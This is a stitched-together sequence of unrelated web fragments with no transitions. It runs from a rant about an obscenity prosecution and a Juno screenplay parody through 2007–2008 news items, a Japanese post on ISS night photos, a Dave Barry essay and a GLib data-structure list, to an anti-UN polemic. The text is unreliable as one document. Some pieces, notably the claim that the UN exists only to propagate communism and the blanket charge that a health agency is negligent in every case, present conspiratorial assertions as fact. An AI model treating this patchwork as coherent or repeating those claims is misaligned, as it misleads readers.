And the only person who belongs in jail in this equation is Brent Ward , a crusading lowlife who thinks that he should have the right to reach into my life , and your life , and punish us for exercising our fundamental rights to express ourselves any way that we damn well please .
Update
Here is a link to Stagliano ’s legal defense fund page .
Share this : Reddit
Email
Facebook
Twitter
Like this : Like Loading ...
Related
On Saturdays , we ask some of our favorite sites on the web to fill in for
us .
You get to learn about an awesome site you may not have heard
of , and we get to watch cartoons in our boxers .
Today we 're bringing
you an abridged version of the screenplay for Oscar winner Juno , as
provided by Rod Hilton , creator of The - Editing - Room.com .
FADE IN :
EXT .
SOME SMALL TOWN
ELLEN PAGE guzzles SUNNY D as some obnoxious INDIE SONG
blares in the background so that everyone knows that this is
an intellectual , independent film .
She enters a convenience store and meets RAINN WILSON .
ELLEN PAGE
I need to use the bathroom , as I 've been downing delicious , high - quality Sunny Delight for the past hour .
RAINN WILSON
Sunny Delight ?
You mean the delicious orange - flavored drink containing a full day 's supply of vitamin C in every serving ?
ELLEN PAGE
That 's right !
I found it in the fridge , behind the purple stuff !
Now relinquish the bathroom key geeves , I for shizz need to spout .
RAINN WILSON
I can barely understand you .
Is there a reason you 're talking like what seems like a teenager designed by a committee of adults that have researched youth by watching MTV around the clock ?
ELLEN PAGE
Yes , and you better start talking like that too or you 'll have no place in the movie , Dwight .
RAINN WILSON
Oh , er , uh , I mean that 's one doodle that can't be undid homeskillet oh my god I need a new agent .
ELLEN PAGE
You 're so quirky !
And so am I !
ELLEN pisses on a pregnancy test and it tells her that she 's PREGNANT as well as PRECOCIOUS .
ELLEN PAGE
This sucks .
The only thing left to do is walk home morosely while yet another obnoxious indie song blares .
ELLEN walks home , then calls her friend OLIVIA THIRLBY .
ELLEN PAGE
Hey Olivia .
So I 'm pregs for real .
OLIVIA THIRLBY
OhMyGodLikeForRealForRealPregs ?
ELLEN PAGE
Holy crap , what the hell are you saying ?
Did someone encrypt your copy of the script or something ?
OLIVIA THIRLBY
YouShouldTotallyGetAnAToTheBortion .
ELLEN PAGE
Yeah .
First I need you to help me salvage the chair I lost my virginity in , which is on a lawn for some reason that is almost definitely quirky .
They take the chair , then ELLEN sets up an entire living room
set in front of MICHAEL CERA'S HOME .
MICHAEL CERA
Ellen , hey .
I like the couch on my front sidewalk , it 's incredibly quirky of you .
ELLEN PAGE
Yeah , well I 'm pretty quirky .
MICHAEL CERA
So what are you doing here ?
Do you need someth -
ELLEN PAGE
Wait , hold on .
Your track team is about to come running by and I need to do a voiceover narration for no particularly reason , even though I only do it like three more times in the entire movie .
ELLEN PAGE ( V.O. )
Whenever I see the track team , I can't help but picture their penises , because doing so allows me to explain that fact in a voiceover narration that I can end with the very hip term " pork swords . "
ELLEN PAGE
Alright , sorry about that .
What were we talking about ?
Oh right , I 'm pregnant and it 's yours .
MICHAEL CERA
Rather than freak the hell out like a typical high school student , I 'm going to sputter around for words awkwardly and barely finish complete sentences .
It 's kind of my thing .
ELLEN calls an ABORTION CLINIC to make an appointment .
CLINIC RECEPTIONIST
( O.S. )
Crimson River Abortion Clinic , how may I help you ?
ELLEN PAGE
Hi .
I 'd like to make an appointment for an abortion .
Oh wait hang on my Hamburger Phone is acting up .
( shakes phone )
Alright , there we go .
CLINIC RECEPTIONIST
( O.S. )
Alright , well just come in any time and we can tak -
ELLEN PAGE
Whoa , whoa , whoa .
I do n't think you heard me .
I 'm talking on a HAMBURGER PHONE .
How zany is that ?
That 's for shizz quirky .
ELLEN goes to the CLINIC and signs in .
Another INDIE SONG
blares over the scene to make sure you remember that you are
supporting INDEPENDENT CINEMA by watching this movie .
CLINIC RECEPTIONIST
Please sign in here .
Do you want a free condom ?
They make my boyfriend 's penis taste like a peanut butter and jelly sandwich .
ELLEN PAGE
Wow , what a completely quirky and inappropriate thing to say to a complete stranger !
CLINIC RECEPTIONIST
I know , right !?
ELLEN suddenly runs out of the CLINIC and visits her friend
OLIVIA .
OLIVIA THIRLBY
WhatAreYouDoingOhMiGod ?
ELLEN PAGE
I decided I want to keep the baby so that I can star in a wholly overrated independent film about a teenager giving her baby to a childless couple .
ELLEN sits down to talk to her father and stepmother .
ELLEN PAGE
So , I 'm pregnant .
J.K. SIMMONS
WHAT YOU'RE FUCKING 16 WHAT THE FU -
ELLEN PAGE
Dad , you 're in an indie flick , remember ?
J.K. SIMMONS
Oh right .
Sorry , I did n't mean to blow up , I meant to make a dry , sarcastic remark .
ALLISON JANNEY
And I 'd like to follow that up with a second barb .
ELLEN PAGE
It 's Michael Cera's .
The kid from Arrested Development .
J.K. SIMMONS
Huh .
I did n't think he had it in him .
ELLEN PAGE
What , sperm ?
ELLEN goes ahead with her pregnancy and the movie SAVED plays
out with fewer jokes and more pretentiousness .
ELLEN finds a couple to adopt her kid : JASON BATEMAN and
JENNIFER GARNER .
ELLEN goes to meet them .
JENNIFER GARNER
We 're so happy you 'd consider us despite the fact that I starred in Elektra .
JASON BATEMAN
So who is the father of the little bastard ?
ELLEN PAGE
Oh , just this awkward , typecast kid at school named Michael Cera .
JASON BATEMAN
No shit ?
He played my son on Arrested Development .
I look forward to the scene in this movie that reunites us for the first time since the show was canceled , which is sure to be a real pleasure for fans .
That scene NEVER HAPPENS .
ELLEN agrees to give her kid to
JENNIFER and JASON .
TIME PASSES and MORE INDIE ROCK MUSIC PLAYS .
ELLEN
goes through the various scenes that movies about pregnant
people are obligated to include .
She visits JASON BATEMAN .
JASON BATEMAN
Hey Ellen .
Want to watch some indie horror films and listen to some indie music together ?
ELLEN PAGE
That sounds great !
I sure hope that watching the movie is n't interrupted by me having to go puke my guts out , sweaty and hunched over the toilet .
( pause )
Just kidding , none of that crap happens in the movie .
Pregnancy is easy - peasy .
JASON BATEMAN
Well , I have good news .
I 'm leaving Jennifer Garner .
ELLEN PAGE
Why , because your marriage to her has robbed you of your youth , which you have been reminded of since you started hanging around with me ?
JASON BATEMAN
No , I just rented 13 Going On 30 .
I can't even look at her now .
Has she been in anything good ?
ELLEN PAGE
Oh .
Because if it was the other thing , then you could take notice of the fact that I remind you of your younger days despite the fact that my current predicament requires a level of maturity far beyond my years , and you could enjoy the contrast between our situations that is ironically illustrated by having us both get along so well .
JASON BATEMAN
How artistic !
ELLEN PAGE
You 're goddamn right it is !
Bring on the Oscars !
LIVEJOURNAL : THE MOVIE continues .
JASON abandons JENNIFER
GARNER .
ELLEN page gives birth while some more INDIE
MUSIC plays .
JENNIFER GARNER
Yay , now I get to raise an adopted kid in a broken home so that I can be overly protective and insane .
ELLEN PAGE
And I passed all of my classes and everything !
Pregnancy is as unobtrusive as it is without consequence !
MICHAEL CERA
So now that you popped the kid out , I think we 're in love with each other .
What should we do to express our love ?
Make out ?
Have sex again ?
Go buy seasons one through three of Arrested Development ?
ELLEN PAGE
Have you been watching a different movie ?
We should play yet more indie music together .
They DO .
EVERYONE convinces themselves they loved the movie
so that they do n't feel STUPID .
END
Radiohead have decided not to travel to the US for a promotional performance because of concerns over global warming .
The Oxford five - piece are due to appear on a special edition of NBC's Late Night with Conan O'Brien .
The band opted to record a live version of House Of Cards in London rather than fly over to the US for the one - off performance .
Radiohead will appear on the show on Wednesday as part of NBC's Green Week .
Frontman Thom Yorke said the band avoided leaving a carbon footprint equivalent to driving a car for a solid year by recording the track in London .
Climate Change
RADIOHEAD GREEN FACTS
Radiohead always consider the carbon footprint when on tour Thom Yorke 's fears over climate change made him back the Big Ask campaign which urges ministers to bring in laws to reduce C02 emissions
He refused to discuss climate change with Tony Blair because he felt the fromer PM had " no environmental credentials "
The band have been long time campaigners on green issues with Yorke recently guest editing The Observer Magazine to promote climate change awareness .
Yorke also recently urged politicians to introduce sweeping measures to cut carbon emissions by 2020 .
" If we do n't get stuck in now , in 20 years ' time it will be worse and things will be more extreme , " he said .
The band kick - off their In Rainbows world tour with a show in West Palm Beach , Florida , on 5 May .
Senate Democrats give up on blocking Mukasey nomination Nick Juliano
Published : Tuesday November 6 , 2007
del.icio.us
Print This Email This UPDATE : Judiciary Committee endorses AG nomination on 11 - 8 vote Despite the criticism they have heaped onto President Bush 's attorney general nominee over the past few weeks , Democrats appear to lack the gumption necessary to do everything possible to prevent Michael Mukasey from becoming the country 's top cop .
Two prominent Democrats on the Judiciary Committee surprised colleagues when they announced support for Mukasey late Friday afternoon .
The support from Sens. Dianne Feinstein ( D - CA ) and Charles Schumer , the New York Democrat who recommended Mukasey early on , virtually assured the success of his nomination .
Mukasey passed out of the committee Tuesday on an 11 - 8 vote .
Feinstein and Schumer were the only Democrats voting with every Republican on the panel in favor of the nominee .
The committee 's chairman , Patrick Leahy ( D - VT ) , voted against Mukasey 's bid to replace long - embattled Alberto Gonzales .
But Leahy encouraged other Democrats on the panel not to request delays in a vote on the nomination , which is scheduled for Tuesday , and he let committee Democrats vote as they please .
 As you know , Sen. Leahy and Sen .
Reid have not made this a caucus vote , and as chairman , Sen .
Leahy has not twisted any arms ,  a Judiciary Committee aide told The Hill .
Senate Majority Leader Harry Reid has similarly expressed concerns about Mukasey 's refusal to declare that waterboarding -- a controversial interrogation technique that simulates drowning -- constitutes torture and is illegal .
Reid has not announced how he will vote , but he is encouraging members not to filibuster the nomination .
" [ Reid has ] been encouraging people to have a full - throated debate , but ... hes actually been discouraging people from filibustering or slowing down the nomination ,  one knowledgeable Senate Democratic source told Roll Call .
Democrats appear to be taking a lesser - of - two - evils approach in relenting to Mukasey 's nomination .
Supporters say he went as far as possible in condemning waterboarding without issuing a precise legal opinion that could have unseen ramifications , and even Mukasey 's detractors acknowledge that he is a big step up from Gonzales ' mangled tenure atop Justice .
Besides , President Bush has just more than a year before he leads office , and he has stressed the attorney general 's role in persecuting the war on terror .
Approving an imperfect nominee seems a better choice for some Democrats than leaving the Justice Department rudderless .
If the Judiciary Committee approves Mukasey Tuesday , as expected , it would open the nomination to debate by the full Senate .
The chamber 's presidential candidates all have announced they will vote against the nominee .
In the following video , Senator Specter says that the legal status of waterboarding is " fuzzy " and Mukasey " went about as far as he could go " in describing its legality under the Constitution .
Specter believes that the issue is " now a matter for the Congress . "
This video is from CNN.com , broadcast on November 6 , 2007 .
In the following video , Senator Ted Kennedy tells the Senate Judiciary Committee that Congress should not have to pass a new law banning waterboarding because " it is already illegal under U.S. law . "
This video is from CNN.com , broadcast on November 6 , 2007 .
What is too much to spend on a suit ?
The question weighed on Barry Schwarz as he scanned the racks at Boyds men's store in Philadelphia , which were laden with $ 3,000 Brioni suits .
" Their prices were just out of the world , " recalls Mr. Schwarz , a professor of psychology at Swarthmore College .
We 've all been there : A window display or a recommendation lures us into a store -- and we face unexpectedly astronomical price tags .
It seems to happen more often these days as many luxury brands -- selling everything from $ 14,000 Ralph Lauren handbags to $ 899 Bugaboo baby strollers and $ 6,900 Beefeater barbecue grills -- push their top price points higher than they 've ever gone before .
What 's priced below falls into that ever - expanding category : " affordable luxury . "
Some people cut and run when confronted with prices that seem crazy .
But many of us experience a sudden emotional - mathematical transformation .
We set a new ceiling for a " reasonable " price .
Disinclined to go all the way to buy the trophy , we instead settle for a consolation prize .
Mr. Schwarz , a jeans - wearing type , walked out of Boyds with a suit that cost merely $ 800 -- the most he'd ever spent on an item of clothing .
" If you 're in that world long enough , $ 800 stops even feeling like a lot of money , " Mr. Schwarz says .
This concept is one of the reasons for the proliferation of $ 300 designer sunglasses these days .
The fact that Ralph Lauren is charging $ 14,000 or so for an alligator " Ricky " handbag makes it easier for a consumer to justify in her mind paying $ 300 for a rather simple sweater .
Many Chanel sunglass owners are actually would - be owners of Chanel suits .
Something similar has happened to many owners of Tiffany keychains , Prada legwarmers , Coach wallets , and Frette tea towels .
When shoppers are confronted with prices they can't afford , a smart retailer will " move you right along to where you can salvage your pride , " says Dan Hill , president of Sensory Logic , a Minneapolis consulting company that helps companies explore their sensory and emotional connections with customers .
Pride , Mr. Hill points out , " is a mixture of anger and happiness . "
That pretty much describes the whole shopping experience at those moments when we 're outpriced ( anger ) , then soothe ourselves with a smaller splurge ( happiness ) .
In Mr. Hill 's case , this played itself out in the purchase of a sweater when what he actually wanted was a certain pair of Jesus Jeans .
A friend of mine remains sheepish about a smashing pair of high - waisted black Prada pants that seemed sensibly priced at $ 500 only after she had spent an hour eyeballing more expensive versions with the encouragement of a salesman at Barneys .
And yes , it 's time to concede to my husband that I spent $ 87 on that T - shirt at Lost & Found in Los Angeles because I could n't bring myself to spend $ 395 on a certain dress .
Given that accessories like sunglasses , fragrances , and logoed belts drive the sales of companies like Gucci and Louis Vuitton , such consolation prizes account for a very sizable chunk of the luxury business these days .
Indeed , this ploy is the soul of Las Vegas -- a town built on people who roll in on Southwest Airlines expecting to play $ 2 blackjack until they see the high rollers at the $ 200 tables .
Next thing you know , they wake up in the baccarat lounge with their own private casino host and a stack of IOUs .
After a while , it just does n't seem like real money .
As for Prof. Schwarz , with his $ 800 suit , " I got sucked in .
And I knew what was happening , " he says .
Mr. Schwarz has since written and spoken about this phenomenon to roughly 75 industry groups with audiences of as many as 8,000 over the past three years .
He has found eager apostles in Microsoft , Google , the National Restaurant Association , General Electric , the Marines , Time Warner , the Dutch government , several health insurers , and Lehman Brothers .
Mr. Schwarz calls the top - priced goods " anchors . "
Anchors , he says , set the ceilings on prices of objects that do n't have a clear value .
That is just about everything in luxury goods and fashion .
In fact , that 's one reason why some in the luxury fashion industry are irritated with retailers like Target and Zara :
They 're seen as setting the ceilings too low .
Retail - consulting guru Paco Underhill says , " This has been a strategy that goes back to the 17th century .
You sold one thing to the king , but everyone in court had to have a lesser one . "
Today , we have Hermès , Fendi , Louis Vuitton , and Gucci .
" There 's the $ 500 bag in the window , and what you walk away with is the T - shirt , " says Mr. Underhill .
" It 's the same strategy as putting the sports car in the window to sell the sedan in the back . "
Still , luxury brands today have fine - tuned the strategy .
The folks at Coach are masters of this .
Look for a notably expensive bag in one of the company 's flagship stores .
Only one or two of them are available for sale , a company spokeswoman pointed out to me .
But scores of similar , smaller , less - elaborate bags are nearby , primed to walk out the door .
And if you can't even go that far , try the wallet or the keychain .
As convenient as it might be to accuse these manufacturers of gouging when they set prices so high on their top goods , there 's nothing nefarious going on here .
Clothing is one of the most democratic marketplaces around .
There 's always another store , another pair of pants to turn to .
[ Via The Wall Street Journal ]
US Economy Is So Bad That Even Prices For Fossilized Warlus Penises Fall By 50 %
How To Make A Million Dollars As A Repairwoman
10 Best Books Every Written On The Subject Of Money
Updated at 12:14 a.m. EDT , May 7 , 2008
At least 57 Iraqis were killed and 90 more were wounded in the latest violence .
One U.S. soldier was killed and another was wounded during an armed attack in Ninewah province .
Also , 3,500 U.S. soldiers , who were part of last summer ’s “ surge ” will be withdrawn in the coming weeks .
Four people were killed and 27 were injured during a car bombing in Tikrit .
In Baghdad , three people were killed , including a female student , and nine were wounded during clashes in Abu Dsheer .
Mortars killed three and wounded 15 near the Facility Protection Services headquarters .
Near a university in Karrada , a Katyusha rocket injured five people , some of them students .
Another rocket injured five near the Sarafiya Bridge .
Mortars near Utifiya wounded 12 people .
U.S. and Iraqi forces killed seven gunmen ; nine more were killed in night raids and two suspects were killed yesterday .
Operations in Shula left 10 suspects dead and 131 detained .
Iraqi authorities raided police troops and a hospital , arresting anyone suspected of having assisted militiamen .
Also , two bodies were found .
Hospital authorities in Sadr City reported six killed and 11 wounded in the latest clashes .
Officials estimate 8000 families have fled Sadr City since clashing between U.S. - Iraqi forces and the Mahdi Army began .
In Mosul , a roadside bomb killed one Iraqi soldier and wounded two more .
Two men killed themselves accidentally when they improperly planted a roadside bomb .
A civilian and two policemen were killed , and two more policemen were wounded during an ambush .
One person was killed during a home invasion .
Police killed two gunmen after the men attacked their patrol .
Three prostitutes were killed and two more were wounded during an attack at a brothel .
Also , four were Islamic Army in Iraq suspects were arrested .
Iraqi and U.S. forces arrested 112 suspects across Iraq .
A number of weapons were confiscated in Missan province .
A policeman was kidnapped in Jalawla .
In Buhriz , a chieftan and three family members were kidnapped .
A roadside bomb in Wajihiya killed one Awakening Council member and wounded a second one .
Compiled by Margaret Griffis
Cities at Night : The View from Space - NASA Earth Observatory Feature
やあ，綺麗な眺めだね。
これは ISS （国際宇宙ステーション）から撮影した東京の夜景。皇居から放射状に広がる光の筋が，東京の都市構造をよく表している。所々に見える光の塊が何か当ててみるのも面白い。羽田空港と成田空港が分かりやすいね。ディズニーランドはどこかな？
こんな眺めは，宇宙飛行士にしてみれば珍しくないものかもしれない。けれど，こういった鮮明な夜景の写真を撮影するのは，実はかなり難しいことなんだ。
夜景をはっきりと撮影するにはシャッタースピードを十分に遅くする必要がある。けれども，シャッタースピードを遅くすると，今度は写真の像がブレてしまう。なんと言っても，宇宙ステーションは秒速 7km もの速度で空を飛んでいるからね。シャッターを開いている間にどうしても被写体が動いてしまうんだ。
この問題を解決したのは，ある宇宙飛行士がこさえた「ハック」だった。
この仰々しいガジェットは，天体写真家がよく使う " barn door tracker " と呼ばれる装置を模して製作されたものだ。 ISS の乗組員であ る
Don Pettit （写真の人）がありあわせの部品を使って製作した。なんでも，
ISS 内に残っていた余剰部品やら，ロシアのプログレス補給船からガメてきた部品やらを組み合わせて作ったんだとか……。これにマキタ製の電動ドリルを突っ込んでギュルギュル回すと，
ISS の動きを打ち消すようにカメラの姿勢を補正してくれるという仕組み。
次の画像は，シカゴの夜景を写したもの。
これは東京とは違って，格子状に区画整備されているのがよく分かる。あと，東京の緑っぽい光とは違って，全体的に橙色に光っているように見える。これは，日本では街灯として水銀灯がよく用いられているのに対して，アメリカではナトリウム灯 ( sodium vapor lamp ) がもっぱら用いられているという事情を表している。
衛星写真は昼のやつも面白いけど，夜のやつは，また違ったものが見えてきて面白いね。
( via KK * Lifestream )
About the author
( NewsTarget )
In many states , citizens and scientists are accusing the CDC's Agency for Toxic Substances and Disease Registry ( ATSDR ) of failing to make the connection between public health problems and industrial sources of pollution -- even in the face of scientific evidence .
National coverage of the toxic trailers housing situation in New Orleans and also the suppression of a study on environmental hazards in the Great Lakes has put attention on the agency .
There are many groups across the nation that are saying that these are just two examples of cases that illuminate an agency pattern of interference in the health data released to the public .
In many cases , evidence shows that the agency covered up important public health information .
Recently , the nonprofit investigative journalism group , The Center for Public Integrity , published a suppressed study by the ATSDR called " Public Health Implications of Hazardous Substances in the Twenty - Six U.S. Great Lakes Areas of Concern . "
The report concludes that over 9 million people living in 26 " areas of concern " have elevated health risks associated with exposure to dioxins , pesticides , lead , mercury , PCBs and six other poisonous chemicals .
These areas include the major metropolitan areas of Chicago , Cleveland , Detroit and Milwaukee .
In many areas , scientists discovered low birth weights , high infant mortality rates , high rates of premature births as well as high rates of death from breast cancer , colon cancer and lung cancer .
The study was scheduled for release in July 2007 .
A few days before its scheduled publication , however , the agency withdrew the study .
Similar events occurred last year in Pennsylvania .
A study was conducted to analyze the high rates of a very rare form of blood cancer called Polycythemia Vera ( PV ) .
The agency released an abstract in December 2007 .
It detailed the rate of PV in three counties surrounding the Tamaqua borough .
They are at least 4.5 times higher than the national average .
The national PV rate is 0.9 in 100,000 .
The rate of confirmed cases in the three Pennsylvania counties is more than 4 in 100,000 .
That number is just a representation of patients who are registered with the National Cancer Registry .
They were tested for a genetic mutation associated with PV for the study .
When data from patients who self - reported being diagnosed with PV is included , the rate increases to approximately 15 times the national average .
The study connects the high PV rates to environmental influences .
The study shows that 18 of the 38 patients confirmed to have PV lived within 13 miles of the MacAdoo Associates Superfund Site .
They lived in this area for more than five years between the years of 1975 and 1979 when large quantities of toxic chemicals were dumped straight into old mine shafts .
Included in those chemicals were heavy metals and low levels of volatile organic compounds that were determined to be contaminating the soil .
A clean - up of the site has been underwritten by the EPA .
Officials later stated that the results " were based on an ATSDR analysis that was later determined to be inappropriate . "
They offered no definition of " inappropriate . "
The statement negates a link between any environmental factors and PV cases , contrary to the data that eliminated other causes .
It also stated that more analysis was needed to " understand whether there is any linkage between PV cases and where patients lived in the past . "
That almost suggests coincidence for the PV patients all living in the same vicinity .
The agency says it retracted the study because the authors used analysis that was determined to be inadequate .
The authors of the PV study are now preparing to submit their work to scientific journals for review .
The ATSDR 's handling of public health studies of environmental situations has proven negligent in every case investigated .
It would almost appear that the agency 's purpose is to make sure no health problem is detected .
Jo HartleyWife , Mother of 8 , and Grandmother of 2Jo is a 41 year old home educator who has always gravitated toward a natural approach to life .
She enjoys learning as much as possible about just about anything !
http://loftymatters.com
- Current Events
http://winemaiden.com
- Simply Abundant Living
As North Carolinians head to the polls , John Edwards , their former senator , has disclosed that after months of being politically courted he will not endorse any candidate in the Democratic primaries .
The two - time presidential contender and his wife , Elizabeth , like much of America , are torn between the two surviving Democrats in the race .
The Edwardses recently sat down with People magazine to explain what they like — and do n’t like — about Barack Obama and Hillary Clinton .
( h/t : Political Wire )
Dave Tosh , from the School of Biological Sciences at Queens University , found the greater white - toothed shrew in Tipperary and Limerick while working with University College Cork and BirdWatch Ireland .
Its natural range is in parts of Africa , France and Germany and before now the closest it has been spotted to Ireland is in the Channel Islands .
As part of his PhD , Dave was studying the diet of the Barn Owl in Ireland .
Last winter John Lusby , Barn Owl Research Officer from Bird Watch Ireland , sent him pellets ( regurgitated food remains ) from owls in Tipperary and Limerick to help with the study .
Dave explained : " It was amongst a batch that I was about to dry in an oven , that I noticed a very large shrew skull .
" Having looked at hundreds of pellets from Ireland already I knew that what I was looking at was very unusual as our native pygmy shrew is very small in comparison .
" I ended up looking through more and more pellets and discovered more and more of the strange shrew skulls . "
In March seven greater white - toothed shrews were trapped at four locations in Tipperary and their existence has just been recorded in the scientific journal Mammal Review .
Professor Ian Montgomery , Head of the School of Biological Sciences at Queen 's , says the animal is likely to have been introduced recently to Ireland and the discovery of a new mammal species in Ireland is extremely rare .
" Most species which occur in Ireland also occur in Britain but the nearest this species of shrew has been found is on the Channel Islands and the Scilly Isles .
" These records are evidence of at least one recent introduction event , probably accidental , from continental Europe to Ireland and has resulted in a rapid increase in numbers over a short period . "
The discovery , however , raises issues related to ecological impact and control which need to be further researched .
While the shrew is likely to sustain threatened birds of prey including the barn owl , it could lead to the loss of small native mammals including the pygmy shrew .
###
Dave Barry is a very VERY funny guy .
He is a Pulitzer - Prize winning author who you can sometimes find in the better American newspapers .
Those of you who read a lot are probably already aware of this fact .
A number of years ago I discovered Mr. Barry courtesy of The Philadelphia Inquirer and began to actively seek out his syndicated writings .
If you are sad and / or miserable he is guaranteed to bring a smile to your face .
But humor is not what this blog is about .
Dave has written hundreds of funny essays and yet the one essay that he wrote that I consider his best is the one that I present here .
It was time to go have my last words with my father .
He was dying , in the bedroom he built .
He built our whole house , even dug the foundation himself , with a diaper tied around his head to keep the sweat out of his eyes .
He was always working on the house , more than 35 years , and he never did finish it .
He was first to admit that he really did n’t know how to build a house .
When I went in to see him , he was lying in the bedroom , listening to “ The People ’s Court . ”
I remember when he always would be on those Sunday - morning television talk shows , back in the fifties and sixties .
Dr. Barry , they called him .
He was a Presbyterian minister , and he worked in inner-city New York .
They were always asking him to be on those shows to talk about Harlem and the South Bronx , because back then he was the only white man they could find who seemed to know anything about it .
I remember when he was quotation of the day in the New York Times .
The Rev. Dr. David W. Barry .
His friends called him Dave .
“ Is Dave there ? ” they ’d ask , when they called to talk about their husbands or wives or sons or daughters who were acting crazy or drinking too much or running away .
Or had died .
“ Dave , ” they ’d ask , “ what can I do ? ”
They never thought to call anybody but him .
He ’d sit there and listen , for hours , sometimes .
He was always smoking .
The doctor told us he was dying , but we knew anyway .
Almost all he said anymore was thank you , when somebody brought him shaved ice , which was mainly what he wanted , at the end .
He had stopped putting his dentures in .
He had stopped wearing his glasses .
I remember when he yanked his glasses off and jumped into the Heymans ’ pool to save me .
So I go in for my last words , because I have to go back home , and my mother and I agree I probably wo n’t see him again .
I sit next to him on the bed , hoping he ca n’t see that I ’m crying .
“ I love you , Dad , ” I say .
He says “ I love you , too .
I ’d like some oatmeal . ”
So I go back out to the living room , where my mother and my wife and my son are sitting on the sofa , in a line , waiting for the outcome and I say , “ He wants some oatmeal . ”
I am laughing and crying about this .
My mother thinks maybe I should go back in and try to have a more meaningful last talk , but I do n’t .
Driving home , I ’m glad I did n’t .
I think :
He and I have been talking ever since I learned how .
A million words .
All of them final , now .
I do n’t need to make him give me any more , like souvenirs .
I think :
Let me not define his death on my terms .
Let him have his oatmeal .
I can hardly see the road .
Share this : Twitter
Facebook
Like this : Like Loading ...
Bill Gates and Steve Ballmer got on stage at D6 with Walt and Kara to talk ...
Microsoft , of course .
While the company is still being rather coy about Windows 7 -- some have blamed loose lips early on in Vista development for saddling the OS with too high of expectations and making things difficult for developers -- they were nice enough to show off what Ballmer called " the smallest snippet " of Windows 7 .
The big reveal was multi- touch support , which utilizes technology developed by the Surface team .
The taskbar seems to have been reworked a bit , and the demo was running live on a Dell Latitude XT tablet .
Apparently Microsoft is reworking the whole user interface with a multitouch experience in mind .
Steve reiterated the " three years after Vista " mantra for availability .
Not exactly earth - shattering , but we 'll take what we can get at this point .
Video added after the break .
Enjoy !
[ Thanks , Dan Z. ]
It used to be if you signed up for a new checking account , a bank might throw off a toaster , alarm clock , or in extreme modern cases , a 1GB iPod shuffle .
Well times , they are a'changing , and boy do we wish we lived in Canada right now .
Up north , RBC Royal Bank is offering a free ASUS Eee PC when you switch to their checking account service .
That 's right , you get an actual computer after completing the move ( and dealing with a lot of red tape ) .
Sure , it 's only the 7 - inch , 2GB version , but it still runs Xandros way better than this solar calculator we got from our bank .
[ Thanks , Matt ]
@ Unevolved ...?:
That 's not a Scion , it 's a motor with an ugly body on it .
@jdepould :
In my neck of the hoods , it 's almost always a Mustang that 's riced out .
We 've got one convertible around here that has a Fokker triplane on the back deck .
Although I have seen a few Neons etc .
@no_slushbox : I reserve the right to make fun of anything .
I prefer not to think of my Saturn as plastic but as " microwave safe " .
Today , Starbucks announced that its quarterly profit has dropped 28 percent .
With the announcement of the drop in profits , Starbucks plan is to cut U.S. store openings and focus on the growing international market .
Do they think this is really the answer ?
Perhaps the best thing would be to share real estate with Wallgreens .
Instead of building on opposite corners they could try the Yum !
Brands model and coexist with each other .
Caffeine and pills : the remedy for all the rich and famous .
Maybe they could try upgrading their pricing structure to include a free bakery item with the purchase of ten coffee items .
For example , for every $ 40 you spend on coffee you could get a free scone .
Maybe another option is to offer free wifi to all the laptop carrying executives and college students .
This would have to be better than the subscription model that is currently available .
I ’m sure there would be some who would suggest to actually sell good coffee .
The kind of coffee that does n’t taste burnt or leave holes in your stomach .
That being said , does anybody really care that Starbucks profits fell 28 percent ?
Does the average American really care that they ’re going to cut the opening of new stores ?
Probably not !
However , when I decide to stop in at Starbucks , they better not cut corners on my caramel macchiato or mocha frappuccino .
I also hope they keep offering those $ 20 coffee cups that my mother - in - law gives me every year for Christmas .
Soaring global food prices could unleash a “ silent tsunami ” that would plunge 100 million people who previously did not require help to buy food into hunger and poverty , the top United Nations food official said at a conference on the growing crisis in London .
“ This is the new face of hunger , ” the official , Josette Sheeran , the executive director of the World Food Program , added .
“ The response calls for large - scale , high - level action by the global community . ”
She was one of 25 experts in the field who attended the conference hosted by Prime Minister Gordon Brown at his Downing Street office .
Prices for basic foods like rice and wheat have risen rapidly since the last quarter of 2007 , leading to riots and protests in a number of countries .
In the latest unrest , demonstrators took to the streets in the Afghan city of Jalalabad and the Gabonese capital , Libreville .
A statement from Mr. Brown ’s office released after the meeting said that delegates had pledged to work with the G - 8 and European Union toward a global strategy to tackle price rises and increase support for the world ’s poorest nations .
There was also agreement for a “ more selective approach ” to biofuels , cited by some for causing the food price surge .
DynCorp International LLC in Falls Church , VA received a $ 13.1 million firm - fixed price contract to design and build a border police headquarters in Bermel , Afghanistan .
Work is expected to be complete by May 14/09 .
Five bids were solicited on April 18/08 , and 1 bid was received by the U.S. Army Engineer District in Afghanistan ( W917PM - 07- D-0014 ) .
Bermel sits just inside Afghan territory in Pakitika Province on the Pakistani border , directly south of Kabul .
Because it is so close to Al - Qaeda ’s territories in Pakistan , and offers a short route to Kabul , it has been a frequent locus of fighting for American and Afghan National Army troops .
Doubly - Linked Lists — linked lists that can be iterated over in both directions
Singly - Linked Lists — linked lists that can be iterated in one direction
Double - ended Queues — double - ended queue data structure
Sequences — scalable lists
Trash Stacks — maintain a stack of unused allocated memory chunks
Hash Tables — associations between keys and values so that given a key the value can be found quickly
Strings — text buffers which grow automatically as text is added
String Chunks — efficient storage of groups of strings
Arrays — arrays of arbitrary elements which grow automatically as elements are added
Pointer Arrays — arrays of pointers to any type of data , which grow automatically as new elements are added
Byte Arrays — arrays of bytes
Balanced Binary Trees — a sorted collection of key / value pairs optimized for searching and traversing in order
N-ary Trees — trees of data with any number of branches
Quarks — a 2 - way association between a string and a unique integer identifier
Keyed Data Lists — lists of data elements which are accessible by a string or GQuark identifier
Datasets — associate groups of data elements with particular memory locations
GVariantType — introduction to the GVariant type system
GVariant — strongly typed value datatype
GVariant Format Strings — varargs conversion of GVariants
GVariant Text Format — textual representation of GVariants
Reference counting —
Reference counting types and functions
Reference counted data —
Allocated memory with reference counting semantics
Atomically reference counted data —
Allocated memory with atomic reference counting semantics
Tactical Assassin 2 has been played 100555 times so far on arcadevoid.com with 0 game plays today .
Tactical Assassin 2 has an average game rating of 3/5 :
Why are so many informed Americans demanding the United States get out of the United Nations ?
Is n't the United Nations a benevolent organization that establishes " peace keepers " in troubled spots around the world and has so many programs " for the children " ?
Nothing could be further from the truth .
The United Nations and it's barbaric butchery is thoroughly documented in G. Edward Griffin 's superb work , " The Fearful Master – A Second Look at the U.N. "
Their atrocities have continued over the decades .
The United Nations was birthed by communists and its only purpose is to propagate communism .
TRENDING : With only days to go until debate , Pelosi gives Biden an out : ' Why bother ? '
Alger Hiss was convicted as a communist spy and was a key player in sucking America into the communist - controlled United Nations .
At the time , Hiss was the director of the State Department 's Office of Special Political Affairs who appointed members of the U.S. delegation to the United Nations .
There is a long history there as well as with historical figures like John Foster Dulles .
